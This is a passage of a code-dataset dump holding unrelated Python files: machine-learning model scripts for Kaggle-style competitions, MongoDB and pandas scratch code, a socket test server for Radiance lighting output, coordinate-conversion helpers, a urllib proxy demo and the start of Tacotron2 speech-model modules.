scipy as sp\n\nimport argparse\nimport os\nimport gc\nimport time\n\nfrom base import *\nfrom features import *\n\nfrom datetime import datetime\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import cross_val_score, StratifiedKFold\n\nbasepath = os.path.expanduser('../')\n\nSEED = 1231\nnp.random.seed(SEED)\n\n#############################################################################################################\n# EXPERIMENT PARAMETERS # \n#############################################################################################################\n\nPARAMS = {\n 'C': 1.,\n 'solver': 'lbfgs',\n 'n_jobs': -1,\n 'random_state': SEED\n}\n\nMODEL_FILENAME = 'v135'\nSAMPLE_SIZE = .3\n\nclass Modelv135(BaseModel):\n def __init__(self, **params):\n self.params = params\n self.n_train = 307511 # TODO: find a way to remove this constant\n \n def load_data(self, filenames):\n dfs = []\n \n for filename in filenames:\n dfs.append(np.load(os.path.join(basepath, self.params['output_path'] + self.params['data_folder'] + f'{filename}')))\n \n dfs = np.hstack(dfs) # concat across column axis\n\n df = pd.DataFrame(dfs)\n \n df.columns = [f'f_{i}' for i in range(dfs.shape[1])] \n df.index = np.arange(len(df))\n\n return df\n \n def reduce_mem_usage(self, df):\n return super(Modelv135, self).reduce_mem_usage(df)\n \n def get_features(self, train, test):\n data = pd.concat((train, test))\n data.index = np.arange(len(data))\n n_features = data.shape[1]\n\n # t0 = time.time()\n\n # feature interaction\n # for i in range(n_features):\n # for j in range(i+1, n_features):\n # data.loc[:, f'f_{i}{j}'] = data.iloc[:, i] - data.iloc[:, j]\n \n # print('Took: {} seconds to generate feature interactions'.format(time.time() - t0))\n\n return data\n\n # This method would perform feature engineering on merged datasets.\n def fe(self, train, test):\n original_train = train.copy()\n data = self.get_features(original_train, test)\n\n train = data.iloc[:len(train)]\n test = data.iloc[len(train):]\n\n del data, original_train\n gc.collect()\n\n return train, test\n\n def train(self, train, test, feature_list, is_eval, TARGET_NAME='TARGET', **params):\n X = train.loc[:, feature_list]\n y = train.loc[:, TARGET_NAME]\n \n Xte = test.loc[:, feature_list]\n yte = []\n\n if is_eval:\n yte = test.loc[:, TARGET_NAME]\n \n return super(Modelv135, self).train_log(X, y, Xte, yte, **params)\n\n def evaluate(self, test, feature_list, is_eval, model, TARGET_NAME='TARGET'):\n Xte = test.loc[:, feature_list]\n yte = []\n\n if is_eval:\n yte = test.loc[:, TARGET_NAME]\n\n return super(Modelv135, self).evaluate_log(Xte, yte, model)\n\n\n def predict_test(self, train, test, feature_list, params, save_path, n_folds=5):\n return super(Modelv135, self).predict_test_xgb(train, test, feature_list, params, save_path, n_folds=n_folds)\n\n\n def cross_validate(self, train, feature_list, params, cv_adversarial_filepath=None, TARGET_NAME='TARGET'):\n Xtr = train.loc[:, feature_list]\n ytr = train.loc[:, TARGET_NAME]\n\n return super(Modelv135, self).cross_validate_log(Xtr, ytr, params, cv_adversarial_filepath=cv_adversarial_filepath)\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='Home Credit Default Risk Solution')\n \n parser.add_argument('-input_path', help='Path to input directory') # path to raw files\n parser.add_argument('-output_path', help='Path to output directory') # path to working data folder \n parser.add_argument('-data_folder', help='Folder name of the dataset') # dataset folder name\n parser.add_argument('-cv', type=bool, help='Cross Validation')\n parser.add_argument('-t',type=bool, help='Full Training on a given seed.')\n parser.add_argument('-s', type=bool, help='Whether to work on a sample or not.')\n parser.add_argument('-seed', type=int, help='Random SEED')\n parser.add_argument('-cv_seed', type=int, help='CV SEED')\n \n args = parser.parse_args()\n\n if args.cv:\n print('Cross validation on training and store parameters and cv score on disk ...')\n \n train_filenames = [\n 'v127_4457_oof_train_preds.npy',\n 'v128_4457_oof_train_preds.npy',\n 'v136_4457_oof_train_preds.npy'\n ]\n\n test_filenames = [\n 'v127_4457_test_preds.npy',\n 'v128_4457_test_preds.npy',\n 'v136_4457_test_preds.npy'\n ]\n\n input_path = args.input_path\n output_path = args.output_path\n data_folder = args.data_folder\n is_sample = args.s\n SEED = args.seed\n\n params = {\n 'input_path': input_path,\n 'output_path': output_path,\n 'data_folder': data_folder\n }\n\n m = Modelv135(**params)\n \n train = m.load_data(train_filenames)\n test = m.load_data(test_filenames)\n\n train, test = m.fe(train, test)\n\n # load target\n target = pd.read_pickle(os.path.join(basepath, output_path + 'feature_groups/' + f'application_train.pkl'))['TARGET'] \n train.loc[:, 'TARGET'] = target.values # add target to train\n\n data = pd.concat((train, test))\n data = m.reduce_mem_usage(data)\n\n print('Shape of data: {}'.format(data.shape))\n \n train = data.iloc[:m.n_train]\n\n del data, test\n gc.collect()\n\n feature_list = train.columns.drop('TARGET').tolist()\n \n PARAMS['random_state'] = SEED\n \n cv_adversarial_filepath = os.path.join(basepath, 'data/raw/cv_idx_test_stratified.csv') \n \n mean_auc, std_auc = m.cross_validate(train, feature_list, PARAMS.copy(), cv_adversarial_filepath)\n cv_score = str(mean_auc) + '_' + str(std_auc)\n \n print('*' * 100)\n print('Best AUC: {}'.format(cv_score))\n \n joblib.dump(PARAMS, os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{SEED}_params.pkl'))\n joblib.dump(cv_score, os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{SEED}_cv.pkl'))\n \n elif args.t:\n print('Full training ..')\n\n train_filenames = [\n 'v127_4457_oof_train_preds.npy',\n 'v128_4457_oof_train_preds.npy',\n 'v136_4457_oof_train_preds.npy'\n ]\n\n test_filenames = [\n 'v127_4457_test_preds.npy',\n 'v128_4457_test_preds.npy',\n 'v136_4457_test_preds.npy'\n ]\n\n\n input_path = args.input_path\n output_path = args.output_path\n data_folder = args.data_folder\n is_sample = args.s\n CV_SEED = args.cv_seed\n SEED = args.seed\n\n params = {\n 'input_path': input_path,\n 'output_path': output_path,\n 'data_folder': data_folder\n }\n\n m = Modelv135(**params)\n \n train = m.load_data(train_filenames)\n test = m.load_data(test_filenames)\n\n train, test = m.fe(train, test)\n\n # load target\n target = pd.read_pickle(os.path.join(basepath, output_path + 'feature_groups/' + f'application_train.pkl'))['TARGET'] \n train.loc[:, 'TARGET'] = target.values # add target to train\n\n data = pd.concat((train, test))\n data = m.reduce_mem_usage(data)\n\n print('Shape of data: {}'.format(data.shape))\n \n train = data.iloc[:m.n_train]\n test = data.iloc[m.n_train:]\n\n del data\n gc.collect()\n\n feature_list = train.columns.drop('TARGET').tolist()\n\n # Load params and holdout score from disk.\n PARAMS = joblib.load(os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{CV_SEED}_params.pkl'))\n HOLDOUT_SCORE = joblib.load(os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{CV_SEED}_cv.pkl'))\n\n PARAMS['random_state'] = SEED\n\n print('*' * 100)\n print('PARAMS are: {}'.format(PARAMS))\n\n # train model\n model, feat_df = m.train(train, test, feature_list, is_eval=False, **PARAMS)\n \n # evaluation part\n preds, score = m.evaluate(test, feature_list, is_eval=False, model=model)\n\n sub_identifier = \"%s-%s-%s-%s-%s\" % (datetime.now().strftime('%Y%m%d-%H%M'), MODEL_FILENAME, HOLDOUT_SCORE, SEED, data_folder[:-1])\n\n sub = pd.read_csv(os.path.join(basepath, 'data/raw/sample_submission.csv.zip'))\n sub['TARGET'] = preds\n\n sub.to_csv(os.path.join(basepath, 'submissions/%s.csv'%(sub_identifier)), index=False)","sub_path":"src/v135.py","file_name":"v135.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606251891","text":"import json\nfrom dateutil.relativedelta import relativedelta as rd\nimport pandas as pd\n\nfile = r'C:/Programming/Python/Projects/mymoney/data/scrubbed-test.csv'\nwith open(file) as data_file:\n data = json.load(data_file)\ndf = pd.DataFrame(data)\n\n\n\n\nfile = r'C:/Programming/Python/Projects/mymoney/data/scrubbed-test.csv'\ndf = pd.read_csv(file)\ndf.fillna('', inplace=True)\ndf['Date'] = pd.to_datetime(df['Date'])\n\ndf.sort_values(['Date', 'Amount', 'Full_Description'], inplace=True, ascending=True)\ndf.reset_index(drop=True, inplace=True)\n\nstart = df['Date'].iloc[0]\nend = df['Date'].iloc[-1]\nmonths = pd.date_range(start=start+rd(months=-1), end=end+rd(months=1), freq='MS') # MS = Month Start\n\nfor month in months:\n indices = df[(df.Date >= month) & (df.Date < month+1)].index.get_values()\n for i in range(0, indices.__len__()):\n df.set_value(indices[i], 'Transaction_Number', int(i+1))\n\ndf['Transaction_ID'] = df['Transaction_Number'].map(lambda x: str(x)[:-2]) + '-' + \\\n df['Date'].apply(lambda x: x.strftime('%m%d%Y'))\ndf['Date'] = df['Date'].apply(lambda x: x.strftime('%m/%d/%Y'))\ndf['Transaction_Number'] = df['Transaction_Number'].map(lambda x: str(x)[:-2])\n\ndict = df.to_dict(orient='records')\n\n\n\n\n\n\n\n\n\ndf.to_csv(path_or_buf=r'C:/users/ncc/df.csv')\n\nprint(df[['Amount', 'Date', 'Full_Description']])\nprint(df[['Amount', 'Date', 'Full_Description', 'Transaction_Number']])\n\n\ndf = pd.DataFrame(columns=['A', 'B'], index= [1, 2, 3, 4])\n\ndf.set_value(1, 'A', 2)\ndf.set_value(4, 'A', 3)\ndf['B'] = df['A'].map(str)\n\na = 'test!'\na[:-2]\n\n\n\ndate = \"2016-03-03T00:00:00.000Z\"\ndatetime.date(date)\n\n\n\n\n\n\nfrom pymongo import MongoClient, UpdateOne\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nclient = MongoClient('localhost', 27017)\nnew_db = Database(client=client, name='new_db')\ncol = Collection(database=new_db, name='col')\ndata = [\n {\n \"id\": \"1\",\n \"data\": \"1\"\n },\n {\n \"id\": \"2\",\n \"data\": \"2\"\n },\n {\n \"id\": \"3\",\n \"data\": \"3\"\n }\n]\nrequests = []\nfor d in data:\n filter = {'id': d['id']}\n requests.append(UpdateOne(filter, update={'$set': d}, upsert=True))\nres = col.bulk_write(requests=requests)\n\nfor row in col.find():\n print(row)\n\n\n\nclient.cl\nbank_schemas = Collection(database=mymoney, name='bank_schemas', create=True)\ndocs = [\n {\n 'format': 'ftb',\n 'headers': ['Transaction Type', 'Date', 'Account Type', 'Description', 'Amount', 'Reference No.', 'Credits', 'Debits']\n },\n {\n 'format': 'cb',\n 'headers': ['Type', 'Trans Date', 'Post Date', 'Description', 'Amount']\n },\n {\n 'format': 'scrubbed',\n 'headers': ['Transaction_ID', 'Date', 'Transaction_Type', 'Account_Name', 'Account_Type', 'Short_Description', 'Full_Description', 'Amount', 'Expense_Type', 'Category_1 ', 'Category_2', 'Category_3', 'Notes', 'Source']\n }\n]\nbank_schemas.insert_many(documents=docs)\nschemas = bank_schemas.find()\nfor schema in schemas:\n print(schema['headers'])\n\nschemas = Collection(database=g.db, name=mymoney.config['COLLECTION_SCHEMAS'])\n\nimport scipy.stats as st\n\nst.norm.cdf(0)\n\n\nfrom pymongo import MongoClient, UpdateOne\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nclient = MongoClient('localhost', 27017)\nmymoney = Database(client=client, name='mymoney')\ncol = Collection(database=mymoney, name='transactions')\n\ncur = col.find({\"Category_1\": \"\"})\n\ndict(cur.next())\n\nfor c in cur:\n print(c)\n\n\n\n\n\n\n\n\n\n\ntest1 = ['Date', 'Transaction_Type', 'Account_Name', 'Account_Type', 'Short_Description', 'Full_Description', 'Amount', 'Expense_Type',\n'Category_1', 'Category_2', 'Category_3', 'Notes']\n\ntest2 = ['Date', 'Transaction_Type', 'Account_Name', 'Account_Type', 'Short_Description', 'Full_Description', 'Amount', 'Expense_Type',\n'Category_1', 'Category_2', 'Category_3', 'Notes']\n\n\nfor i in range(0, test1.__len__()):\n print(test1[i] == test2[i])\n\nfor header in test1:\n if header not in test2:\n print('fuck')\n print(header)","sub_path":"test/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"175212077","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 29 17:53:37 2019\n\n@author: kazuki.onodera\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport os, gc\nfrom glob import glob\nfrom tqdm import tqdm\n\nimport sys\nsys.path.append(f'/home/{os.environ.get(\"USER\")}/PythonLibrary')\nimport lgbextension as ex\nimport lightgbm as lgb\nfrom multiprocessing import cpu_count\n\nimport utils\n\n#utils.start(__file__)\n# =============================================================================\n\n#SUBMIT_FILE_PATH = '../output/0328-1.csv.gz'\n#\n#COMMENT = 'lgb shuffle row'\n\nEXE_SUBMIT = True\n\nNFOLD = 5\n\nLOOP = 1\n\nparam = {\n 'objective': 'binary',\n 'metric': 'None',\n \n 'learning_rate': 0.1,\n 'max_depth': -1,\n 'num_leaves': 2**6 -1,\n 'max_bin': 255,\n \n 'min_child_weight': 10,\n 'min_data_in_leaf': 150,\n 'reg_lambda': 0.5, # L2 regularization term on weights.\n 'reg_alpha': 0.5, # L1 regularization term on weights.\n \n 'colsample_bytree': 0.5,\n 'subsample': 0.7,\n# 'nthread': 32,\n 'nthread': cpu_count(),\n 'bagging_freq': 1,\n 'verbose':-1,\n }\n\n\nNROUND = 9999\nESR = 100\nVERBOSE_EVAL = 50\nSEED = np.random.randint(9999)\n\n\n# =============================================================================\n# load\n# =============================================================================\nX_train = pd.read_csv('../input/train.csv.zip')\n\ny_train = X_train['target']\nX_train = X_train.iloc[:,2:]\n\nX_train_0 = X_train[y_train==0]\nX_train_1 = X_train[y_train==1]\n\ndef shuffle(df):\n df_ = pd.DataFrame(index=df.index)\n for c in tqdm(df.columns):\n df_[c] = df[c].sample(frac=1).values #+ (0.1*np.random.uniform( -1,1, len(df) ))\n return df_\n\n\nX_train_ = pd.concat([shuffle(X_train_0), shuffle(X_train_0), shuffle(X_train_0),\n shuffle(X_train_1), shuffle(X_train_1), shuffle(X_train_1),\n ]).sort_index()\ny_train_ = pd.concat([y_train, y_train, y_train\n ]).sort_index()\n\n\n# =============================================================================\n# model\n# =============================================================================\ndtrain = lgb.Dataset(X_train_, y_train_.values, \n free_raw_data=False)\ngc.collect()\n\nmodel_all = []\nnround_mean = 0\nloss_list = []\ny_preds = []\nfor i in range(LOOP):\n gc.collect()\n \n param['seed'] = np.random.randint(9999)\n \n ret, models = lgb.cv(param, dtrain, NROUND,\n nfold=NFOLD,\n# folds=group_kfold.split(X_train_, y_train_, group),\n stratified=True, shuffle=True,\n feval=ex.eval_auc,\n early_stopping_rounds=ESR, \n verbose_eval=VERBOSE_EVAL,\n seed=SEED+i)\n \n y_pred = ex.eval_oob(X_train_, y_train_.values, models, SEED+i, \n# folds=group_kfold.split(X_train_, y_train_, group),\n stratified=True, shuffle=True)\n y_preds.append(y_pred)\n \n model_all += models\n nround_mean += len(ret['auc-mean'])\n loss_list.append( ret['auc-mean'][-1] )\n\nnround_mean = int((nround_mean/LOOP) * 1.3)\n\n\n## =============================================================================\n## test\n## =============================================================================\n#\n#test = pd.read_csv('../input/test.csv.zip')\n#\n#sub = pd.read_csv('../input/sample_submission.csv.zip')\n#\n#for model in tqdm(models):\n# sub['target'] += pd.Series(model.predict(test.iloc[:,1:])).rank()\n#sub['target'] /= sub['target'].max()\n#\n#\n#\n#\n#\n#\n#\n## save\n#sub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')\n#\n## =============================================================================\n## submission\n## =============================================================================\n#if EXE_SUBMIT:\n# print('submit')\n# utils.submit(SUBMIT_FILE_PATH, COMMENT)\n#\n#\n#\n##==============================================================================\n#utils.end(__file__)\n##utils.stop_instance()\n\n\n","sub_path":"py/lgb_aug.py","file_name":"lgb_aug.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585381541","text":"#!/usr/bin/env python3\n\nimport socket\nimport json\nimport struct\nimport time\n\nclass RadianceOutputDevice:\n def __init__(self, port=9001):\n self.port = port\n\n def listen(self):\n self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.serversocket.bind((\"\", self.port))\n self.serversocket.listen(1)\n\n def accept(self):\n (clientsocket, address) = self.serversocket.accept()\n self.clientsocket = clientsocket\n self.buffer = b\"\"\n\n def send_packet(self, d):\n length_bytes = struct.pack(\"<I\", len(d))\n #print(\"sending\", len(length_bytes + d), \"bytes\")\n self.clientsocket.send(length_bytes + d)\n\n def send_description(self, description):\n self.send_packet(bytes((0,)) + bytes(json.dumps(description), encoding=\"utf8\"))\n\n def send_get_frame(self, frame_period_ms):\n self.send_packet(bytes((1,)) + struct.pack(\"<I\", frame_period_ms))\n\n def send_lookup_2d(self, locations):\n locations_flat = [item for sublist in locations for item in sublist]\n self.send_packet(bytes((3,)) + struct.pack(\"<{}f\".format(len(locations_flat)), *locations_flat))\n\n def send_physical_2d(self, locations):\n locations_flat = [item for sublist in locations for item in sublist]\n self.send_packet(bytes((4,)) + struct.pack(\"<{}f\".format(len(locations_flat)), *locations_flat))\n\n def send_geometry_2d(self, fn):\n with open(fn, \"rb\") as f:\n self.send_packet(bytes((5,)) + f.read())\n\n def recv_packet(self):\n while True:\n result = self.clientsocket.recv(4096)\n if not result:\n break\n self.buffer += result\n if len(self.buffer) > 4:\n (packet_length,) = struct.unpack(\"<I\", self.buffer[0:4])\n if len(self.buffer) - 4 >= packet_length:\n packet = self.buffer[0:packet_length + 4]\n self.buffer = self.buffer[packet_length + 4:]\n return packet\n\n def parse_frame(self, packet):\n if packet[4] != 2:\n return\n return [(packet[i], packet[i+1], packet[i+2], packet[i+3]) for i in range(5, len(packet), 4)]\n\ndef main():\n d = RadianceOutputDevice()\n d.listen()\n\n while True:\n print(\"Waiting for a connection on port {}\".format(d.port))\n d.accept()\n\n print(\"Connected!\")\n # This tells Radiance the name of our device, and how big the sampled canvas should be.\n d.send_description({\"name\": \"Python test server\", \"size\": [100,100]})\n\n # This would request 5 pixels at the corners and center.\n #d.send_lookup_2d([(0, 0), (0, 1), (1, 0), (1, 1), (0.5, 0.5)])\n\n # Instead, lets request 120 pixels around the border.\n N = 30\n pts = [(0, i / N) for i in range(N)]\n pts += [(i / N, 0) for i in range(N)]\n pts += [(1, 1 - i / N) for i in range(N)]\n pts += [(1 - i / N, 1) for i in range(N)]\n d.send_lookup_2d(pts)\n\n # If we stopped here, Radiance would visualize this display using the lookup coordinates\n # and show a square.\n # If the physical display looks different, we tell Radiance about it with the\n # \"physical coordinates\" command.\n # Lets tell Radiance to visualize the points as a circle instead.\n\n import math\n def moveToCircle(x, y):\n l = math.hypot(x - 0.5, y - 0.5)\n return (0.5 * (x - 0.5) / l + 0.5, 0.5 * (y - 0.5) / l + 0.5)\n d.send_physical_2d([moveToCircle(x, y) for (x, y) in pts])\n\n # We can send radiance a PNG file to be used as a background image for visualization.\n # This logo image is not very useful, but perhaps some line-art of your venue would work well.\n\n #d.send_geometry_2d(\"../resources/library/images/logo.png\")\n\n # Ask for frames from Radiance every 10 ms (100 FPS)\n\n d.send_get_frame(10)\n\n while True:\n packet = d.recv_packet()\n if not packet:\n break\n # Print out the received pixel colors.\n # This line is commented out because it generates a lot of output.\n #print(d.parse_frame(packet))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"support/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422245221","text":"import json\nimport math\nfrom decimal import Decimal, ROUND_HALF_UP\n# Here are all your options for rounding:\n# This one offers the most out of the box control\n# ROUND_05UP ROUND_DOWN ROUND_HALF_DOWN ROUND_HALF_UP\n# ROUND_CEILING ROUND_FLOOR ROUND_HALF_EVEN ROUND_UP\n\n# Function called by pathfind_from_json which takes the data it gets initially\n# and does the primary conversion of data into the proper X, Y and lat long\ndef readJSON(data, scale):\n\n #globally store JSON message\n Json = json.loads('{}')\n\n\n\n #Boundary\n x = convert_lon_to_x(data[\"boundary\"][\"coordinates\"][0][\"longitude\"])\n y = convert_lat_to_y(data[\"boundary\"][\"coordinates\"][0][\"latitude\"])\n data[\"boundary\"][\"coordinates\"][0][\"x\"] = x\n data[\"boundary\"][\"coordinates\"][0][\"y\"] = y\n\n\n\n\n\n #Goal\n x = convert_lon_to_x(data[\"goal\"][\"coordinates\"][\"longitude\"])\n y = convert_lat_to_y(data[\"goal\"][\"coordinates\"][\"latitude\"])\n data[\"goal\"][\"coordinates\"][\"x\"] = x\n data[\"goal\"][\"coordinates\"][\"y\"] = y\n \n #Obstacles\n loc = 0\n loc2 = 0\n #print(\"length of obstacles: {0}\\nObstacle1: {1}\\n\".format(len(data[\"obstacles\"]), data[\"obstacles\"][0]))\n\n if \"obstacles\" not in data:\n print(\"No Obstacles\")\n else:\n while loc < len(data[\"obstacles\"]):\n while loc2 < len(data[\"obstacles\"][loc][\"obstacle_info\"]):\n data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"x\"] = convert_lon_to_x(data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"longitude\"])\n data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"y\"] = convert_lat_to_y(data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"latitude\"])\n loc2 += 1\n loc += 1\n loc2 = 0\n\n #Robot\n x = convert_lon_to_x(data[\"robots\"][0][\"coordinates\"][\"longitude\"])\n y = convert_lat_to_y(data[\"robots\"][0][\"coordinates\"][\"latitude\"])\n data[\"robots\"][0][\"coordinates\"][\"x\"] = x\n data[\"robots\"][0][\"coordinates\"][\"y\"] = y\n \n with open('data.json', 'w') as outfile:\n json.dump(data, outfile, sort_keys = True, indent = 4, ensure_ascii = False)\n \n return data\n\n# Pseudo Mercator Projections\n# Please don't hate me for the conversion below. It was honestly the best way to do it.\n# Round of float did not work. So it is rounded to decimal places by casting to string and recasting to float\ndef convert_lon_to_x(lon):\n r_major = 6378137.000\n string = \"{:.3f}\".format(r_major*math.radians(lon))\n temp = float(string)\n xout = round(temp, 1) \n #print(\"LON TEMP: {0} | {1}\".format(temp, xout)) \n\n return xout\n\ndef convert_lat_to_y(lat):\n r_major = 6378137.000\n tmath = 0-r_major*math.log(math.tan(math.pi/4.0+lat*(math.pi/180.0)/2.0))\n string = \"{:.3f}\".format(tmath)\n temp = float(string) \n\n yout = round(temp, 1)\n #print(\"LAT TEMP: {0} | {1}\".format(temp, yout))\n\n return yout\n\ndef convert_x_to_lon(x):\n r_major = 6378137.000\n return math.degrees(x/r_major)\n\ndef convert_y_to_lat(y):\n r_major = 6378137.000\n y = (0-y)/r_major\n return 180.0/math.pi*(2.0*math.atan(math.exp(y))-math.pi/2.0)\n\n\n\n# returns distance in meters on the mercator map projection\n# from 0 lat 0 lon to the point on the sphere\ndef latlon_xy(coordinates):\n xy = []\n for coordinate in coordinates:\n # reversing order since lat comes first in these\n xy.append((convert_lon_to_x(coordinate[1]), convert_lat_to_y(coordinate[0])))\n return xy\n\ndef xy_latlon(points):\n coordinates = []\n for point in points:\n # reversing order since lat comes first in these\n coordinates.append((convert_y_to_lat(point[1]), convert_x_to_lon(point[0])))\n return coordinates\n\n# Some other helpful functions\ndef findBoundingRectangle(coordinates):\n min_x = min(coordinates, key=lambda t: t[0])[0]\n min_y = min(coordinates, key=lambda t: t[1])[1]\n max_x = max(coordinates, key=lambda t: t[0])[0]\n max_y = max(coordinates, key=lambda t: t[1])[1]\n return [(min_x, min_y), (max_x, max_y)]\n\n# rounds to nearest base\n# ex. round(3.1415,10) => 0\n# ex. round(3.1415,1) => 3\ndef round(x,base):\n return int(math.ceil(x/base))*base\n\ndef localizeXY(points,core):\n res = []\n for point in points:\n res.append( (point[0]-core[0],point[1]-core[1]) )\n return res\n\ndef rescaleXY(points,scale,base):\n res = []\n for point in points:\n res.append( (round(point[0]*scale,base),round(point[1]*scale,base)) )\n return res\n\ndef backscaleXY(points,scale):\n res = []\n for point in points:\n res.append( (round(point[0]/scale,1),round(point[1]/scale,1)) )\n return res\n\ndef delocalizeXY(points,core):\n res = []\n for point in points:\n res.append( (point[0]+core[0],point[1]+core[1]) )\n return res\n","sub_path":"Pathfinding_and_InternalTesting/latLongConversion.py","file_name":"latLongConversion.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"534759764","text":"import argparse\n\nfrom experiment_database_reading_manager import ExperimentDatabaseReadingManager\nfrom hplots.hgcal_analysis_plotter import HGCalAnalysisPlotter\nimport sql_credentials\n\nparser = argparse.ArgumentParser(\n 'Analyse predictions from object condensation and plot relevant results')\nparser.add_argument('table_prefix',\n help='Output directory with .bin.gz files or a txt file with full paths of the bin gz files')\nparser.add_argument('output',\n help='PDF file')\n\n\nargs = parser.parse_args()\n\n\nplotter = HGCalAnalysisPlotter()\nreading_manager = ExperimentDatabaseReadingManager(mysql_credentials=sql_credentials.credentials)\nplotter.add_data_from_database(reading_manager, table_prefix=args.table_prefix)\n# plotter.add_data_from_database(reading_manager, table_prefix='alpha_plots_a2')\nplotter.write_to_pdf(args.output, formatter=lambda x: '$\\\\beta=%.2f$'%(x['beta_threshold']))","sub_path":"scripts/make_hgcal_plots_from_database.py","file_name":"make_hgcal_plots_from_database.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"495081533","text":"#!/usr/bin/env python\nimport itertools\n\ndef combination(xss):\n number_of_lists = len(xss)\n for f in xss:\n f.sort()\n ans = list(itertools.product(*xss))\n status = []\n\n for tup in ans:\n if sorted(tup) == list(tup):\n status.append(1)\n else:\n status.append(0)\n\n # print(ans)\n # print(status)\n # print(list(itertools.compress(ans, status)))\n\n # d for d, s in zip(data, selectors) if s\n return list(itertools.compress(ans, status))\n\nxss = [\n [\"apple\", \"banana\", \"pear\"],\n [\"car\", \"truck\"],\n [\"zambia\", \"malawi\", \"kenya\"]\n]\n\nprint(combination(xss))","sub_path":"python3/dimagi/set-combination.py","file_name":"set-combination.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492984926","text":"#!/usr/bin/python\n#coding:utf-8\nimport urllib, urllib2, random\n\ndef url_open(url):\n head = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114Safari/537.36','Cookie':'AspxAutoDetectCookieSupport=1'}\n req = urllib2.Request(url, None, head)\n html = urllib2.urlopen(req).read()\n return html\n\niplist = ['121.193.143.249:80']\n\nproxy_handler = urllib2.ProxyHandler({'http': random.choice(iplist)})\n\nopener = urllib2.build_opener(proxy_handler)\n\nr = opener.open('http://httpbin.org/ip')\n\nprint(r.read())\n\n","sub_path":"re_math.py/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"202900975","text":"import torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport random\nimport new_models.Tacotron2.hyperparams as hp\n\nfrom modules.Attention_modules import LocationAttention,Attention\nfrom modules.Sequential_modules import *\nfrom modules.Basic_modules import CustomEmbedding\nclass ConvBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, padding):\n super(ConvBlock, self).__init__()\n self.conv = nn.Conv1d(in_channels, out_channels, kernel_size, padding=padding)\n self.batch = nn.BatchNorm1d(out_channels)\n self.dropout = nn.Dropout(p=0.5)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.batch(x)\n x = self.relu(x)\n return self.dropout(x)\n\n\nclass ConvTanhBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, padding):\n super(ConvTanhBlock, self).__init__()\n self.conv = nn.Conv1d(in_channels, out_channels, kernel_size, padding=padding)\n self.batch = nn.BatchNorm1d(out_channels)\n self.tanh = nn.Tanh()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.batch(x)\n return self.tanh(x)\n\n\nclass PreNet(nn.Module):\n \"\"\"\n Extracts 256d features from 80d input spectrogram frame\n \"\"\"\n\n def __init__(self, in_features=80, out_features=256, dropout=0.5):\n super(PreNet, self).__init__()\n self.fc1 = nn.Linear(in_features, out_features)\n self.fc2 = nn.Linear(out_features, out_features)\n self.relu = nn.ReLU()\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, previous_y):\n x = self.relu(self.fc1(previous_y))\n x = self.dropout(x)\n x = self.relu(self.fc2(x))\n x = self.dropout(x)\n return x\n\n\nclass PostNet(nn.Module):\n def __init__(self):\n super(PostNet, self).__init__()\n self.conv1 = ConvTanhBlock(in_channels=1, out_channels=512, kernel_size=5, padding=2)\n self.conv2 = ConvTanhBlock(in_channels=512, out_channels=512, kernel_size=5, padding=2)\n self.conv3 = ConvTanhBlock(in_channels=512, out_channels=512, kernel_size=5, padding=2)\n self.conv4 = ConvTanhBlock(in_channels=512, out_channels=512, kernel_size=5, padding=2)\n self.conv5 = nn.Conv1d(in_channels=512, out_channels=1, kernel_size=5, padding=2)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n return self.conv5(x)\n\n\nclass Encoder(nn.Module):\n\n def __init__(self, num_chars=hp.num_chars, embedding_dim=512, hidden_size=256):\n super(Encoder, self).__init__()\n self.char_embedding = nn.Embedding(num_embeddings=num_chars,\n embedding_dim=embedding_dim, padding_idx=0)\n self.conv1 = ConvBlock(in_channels=embedding_dim, 